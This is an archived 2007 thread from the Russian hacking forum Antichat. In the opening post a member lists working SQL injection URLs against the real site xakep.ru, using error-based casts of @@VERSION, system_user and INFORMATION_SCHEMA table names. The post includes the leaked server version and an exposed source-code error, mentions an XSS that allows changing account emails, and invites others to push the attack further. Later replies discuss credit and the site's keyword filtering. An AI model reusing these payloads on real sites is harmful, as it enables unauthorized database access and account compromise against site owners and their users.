ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
05.10.2007, 22:08
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
хакер.ru
вот подборка по ресурсу ХАКЕР.ru.. мо что-то интересное получится
SQL-injection
скуля вполне рабочая вот только с таблици достать не получилось.. так версия, юзер и тд
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast(@@VE RSION+as+nv
archar))--&site=xakep
Microsoft SQL Server 2005 - 9.
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast(syst em_user+as+
nvarchar))--&site=xakep
system_user
ну вот что-то посерьезнее вытянуть очень тяжело
тут еще и второй параметр уязвим))
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast((SEL ECT+TOP+1+T
ABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)+as+nvarc har))--&site=xakep
http://xakep.ru/local/admin/voter.asp?action=add&filedir=38150&site=xakep'%20o r%201=@@version
--
Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Server Error
http://wiki.xakep.ru/Pages.aspx?Cat=%ce%ef%e5%f0%e0%f6%e8%ee%ed%ed%fb%e 5%20%f1%e8%f1%f2%e5%ec
%fb'+and+1=1--
http://wiki.xakep.ru/Pages.aspx?Cat=%ce%ef%e5%f0%e0%f6%e8%ee%ed%ed%fb%e 5%20%f1%e8%f1%f2%e5%ec
%fb'%20and%201=1--
http://wiki.xakep.ru/Pages.aspx?Cat=%c8%ed%f2%e5%f0%ed%e5%f2%3Cb%3Eaaa% 3C/b%3E
PHP код:
Line 58: if (Request["Cat"] != null ? !Request["Cat"].Equals("-") : false)
Line 59: category = Request["Cat"].ToString();
Line 60: DataTable ds = Pages.Instance.DataPages((SessionFacade.Published ? 1 :
0), category);
Line 61: AllRows = ds.Rows.Count;
Line 62: DataGrid1.DataSource = ds.DefaultView;
Source File: d:\morazm\www\wiki\xakep\Pages.aspx.cs Line: 60
з.ы. когда-то мыла можно было изменять через ксс потом прикрили... теперь вот опять можна
http://wiki.xakep.ru/Profile.aspx
з.з.ы еще где то в теме с пасивками лежит пасивка на хакере /*раньше работало)*/
тут еще с типами боянчег
http://www.xakep.ru/articles/magazine/archive.asp?magazine=xa'--&year=2007
кто сможет раскрутить на что-то нормальное (: |
|
|
05.10.2007, 22:10
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
копирайты?
|
|
|
|
05.10.2007, 22:12
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
все что я постил все нашел сам..
идею с cast от тебя..
поиск не юзал.. а надо было бы(( если все написаное уже было на форуме /*хотя я такого не видел, и не только я*/
и все думают что она не нужна, прошу удалить тему!
Последний раз редактировалось halkfild; 05.10.2007 в 23:20..
|
|
|
|
06.10.2007, 03:40
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Ничего особого, но прикольно. Пусщай теперь хакер про свои баги пишет!)))
|
|
|
|
06.10.2007, 14:04
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
На сfмом сайте 5-6 скулей.
В каждой из них фильтуются "tables","select", information_*
Полный бесперспективняк. по крайней мере этих местах
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
